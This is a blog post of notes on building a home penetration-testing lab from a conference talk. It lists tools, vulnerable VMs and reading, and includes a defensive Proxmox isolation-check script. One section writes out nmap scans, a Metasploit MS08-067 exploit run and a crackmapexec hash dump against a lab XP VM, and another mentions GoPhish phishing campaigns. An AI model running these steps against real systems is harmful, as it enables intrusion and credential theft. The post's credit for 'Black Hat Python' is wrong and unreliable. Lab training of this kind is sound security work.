Notes on how to create a Penetration Testing Lab
I’ve always had an interest in penetration testing and have messed around with nmap and Nessus, but now I’m going to dig in my heels and become proficient using the tools in the pen-test theater. The following post is more of an outline of what is found in a YouTube video I found here from Derbycon 2016. This speaker was inspiring, as were a few others who’ve spoken, because they said that sysadmins make good penetration testers. They mentioned that someone who is good at building systems and networks in general does well at breaking them down and actively locating and fixing problems in other systems. I am not looking to become a script kiddie, or a black hat/dark side cracker for that matter, but I do hope to become proficient with the tools they use, as well as work with Python to build my own tools.
Since I last upgraded my VM server to Proxmox, I’ve been kicking around ideas on how to use the hardware to its fullest potential. I’ve already gotten started by first creating a new network on my Proxmox host, and started up my first server in my segregated ‘insecure’ network by spinning up an isc-dhcp-server. I’ll probably post info on my build as I go along, so stay tuned.
-Start of Video notes-
Credit: David Boyd
Pentest lab requirements:
- Core i5 CPU
- 16 GB RAM
- 250-500 GB HDD
- 7-Zip
VM software:
- VirtualBox
- VMware
- Hyper-V
- (I’ll be using) Proxmox
Pentesting platforms:
- Kali Linux
- Samurai WTF (WebAppTesting)
- SamuraiSTFU (Utility Hacking)
- Deft Linux (Forensics)
Old stuff:
- olpix (?)
- IWax (?)
- backtrack (now Kali)
Offensive Security provides pre-built Linux distro images (Kali)
Note: generate your own SSH keys rather than keeping the ones that ship inside a pre-built image
Now need something to attack…
Vulnerable VM’s:
- Metasploitable 2 (Metasploit) – intentionally vulnerable Ubuntu with remote logins, backdoors, default passwords, and vulnerable web services
- Morning Catch (Phishing)
- OWASP BrokenWebApplications (WebApps)
- WebGoat (Web Applications)
- vulnhub.com (challenge VMs)
- Kioptrix (Beginners)
- PwnOS
Guides to pen-test exploits:
https://community.rapid7.com/docs/DOC-1875
Introducing Morning Catch
http://blog.cobaltstrike.com/2014/08/06/introducing-morning-catch-a-phishing-paradise/ – real working phishing lab
Sans Mutillidae Whitepaper
https://www.sans.org/reading-room/whitepapers/testing/introduction-owasp-mutillidae-ii-web-pen-test-training-environment-34380
VM’s to build and test:
- Windows XP
- Windows Server
- MS Exchange
- Windows 7
- Build your own domain
Download evaluations, take snapshots, and revert if they expire:
- TechNet Evaluation Center, Server 2012: https://www.microsoft.com/en-US/evalcenter/evaluate-windows-server-2012
- Win7/8/10: https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/
Do not expose vulnerable VMs to the internet!
Make them host-only (or, in Proxmox, create a new bridge with no physical port attached)
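As an added example (not from the talk or the original post), a small shell check for a Proxmox-style /etc/network/interfaces file that confirms a lab bridge has no physical NIC enslaved and no gateway or NAT rule behind it; the bridge names and the sample file are constructed for the demo.

```shell
#!/bin/sh
# Added example: verify that a Proxmox bridge (ifupdown syntax) is isolated,
# i.e. no physical NIC attached and no NAT/forwarding, so lab VMs stay inside.
# Print the "iface" stanza for bridge $2 from file $1 (comment lines skipped).
bridge_stanza() {
    awk -v br="$2" '
        /^[[:space:]]*#/ { next }
        $1 == "auto"     { inside = 0 }            # "auto X" starts the next stanza
        $1 == "iface"    { inside = ($2 == br) }
        inside           { print }
    ' "$1"
}
# Return 0 if isolated, 1 if traffic can leave the lab, 2 if the bridge is missing.
check_isolated_bridge() {
    stanza=$(bridge_stanza "$1" "$2")
    [ -n "$stanza" ] || { echo "$2: not defined in $1"; return 2; }
    # 1. No physical port or VLAN may be enslaved to the bridge.
    ports=$(printf '%s\n' "$stanza" | awk '$1 == "bridge-ports" || $1 == "bridge_ports" { print $2 }')
    if [ "$ports" != "none" ]; then
        echo "$2: bridge-ports is '$ports', lab traffic can reach the LAN"; return 1
    fi
    # 2. No gateway, IP forwarding or masquerade rule (the Proxmox NAT pattern).
    if printf '%s\n' "$stanza" | grep -Eq 'MASQUERADE|ip_forward|^[[:space:]]*gateway'; then
        echo "$2: NAT/gateway configured, the host would route lab traffic out"; return 1
    fi
    echo "$2: isolated (bridge-ports none, no NAT)"
}
# Constructed sample file (not from a real host): a LAN bridge, an isolated
# lab bridge, and a NAT bridge. Prints the temp file path.
write_sample_interfaces() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
auto vmbr0
iface vmbr0 inet static
    address 192.168.1.10/24
    gateway 192.168.1.1
    bridge-ports eno1
auto vmbr1
iface vmbr1 inet manual
    bridge-ports none
auto vmbr2
iface vmbr2 inet static
    address 10.10.10.1/24
    bridge-ports none
    post-up iptables -t nat -A POSTROUTING -s 10.10.10.0/24 -o vmbr0 -j MASQUERADE
EOF
    echo "$f"
}
```

Run it against the real file with `check_isolated_bridge /etc/network/interfaces vmbr1` on the Proxmox host; only the bridge that reports "isolated" should carry the vulnerable VMs.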
More tools:
- nmap
- nessus
- Cain (still works)
- Responder
- John the Ripper / hashcat
- Metasploit (free version works great)
- Discover Scripts – great stuff, great reconnaissance
- PowerShell Empire
- CrackMapExec (post-exploitation)
How to build a test domain controller and add users with various privileges:
http://thehackerplaybook.com/windows-domain.htm
Once the virtual machines have been set up and set to ‘host only’,
ping each VM to confirm they can reach one another
Initial testing and exploit example:
On Kali:
nmap 192.168.110.2 (the XP VM)
nmap -O 192.168.110.2 (OS detection)
msfconsole
msf > search ms08-067
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
(shows module options)
msf exploit(ms08_067_netapi) > set RHOST 192.168.110.2
msf exploit(ms08_067_netapi) > exploit
kali:~# crackmapexec
(dumps hashes)
Phishing server: load up GoPhish, set it up, add users, and make a campaign
Additional training:
Metasploit unleashed
https://www.offensive-security.com/metasploit-unleashed
Hack This Site!
https://www.hackthissite.org/
Youtube videos:
Derbycon, BSides, DefCon, ISSA
More information: Sans Cyber Aces, InfoSec Institute, Cybrary
It’s wise to find a mentor, as well as to do some mentoring
Recommended reading (actual paper books):
- The Hacker Playbook
- Penetration Testing – A Hands-On Introduction to Hacking – Georgia Weidman
- Metasploit – The Penetration Tester’s Guide
- Hacking – The Art of Exploitation – Erickson
- Professional Penetration Testing
- The Art of Intrusion – Kevin Mitnick
- The Art of Deception – Kevin Mitnick
- Ghost in the Wires – Kevin Mitnick
- Black Hat Python – Jason Street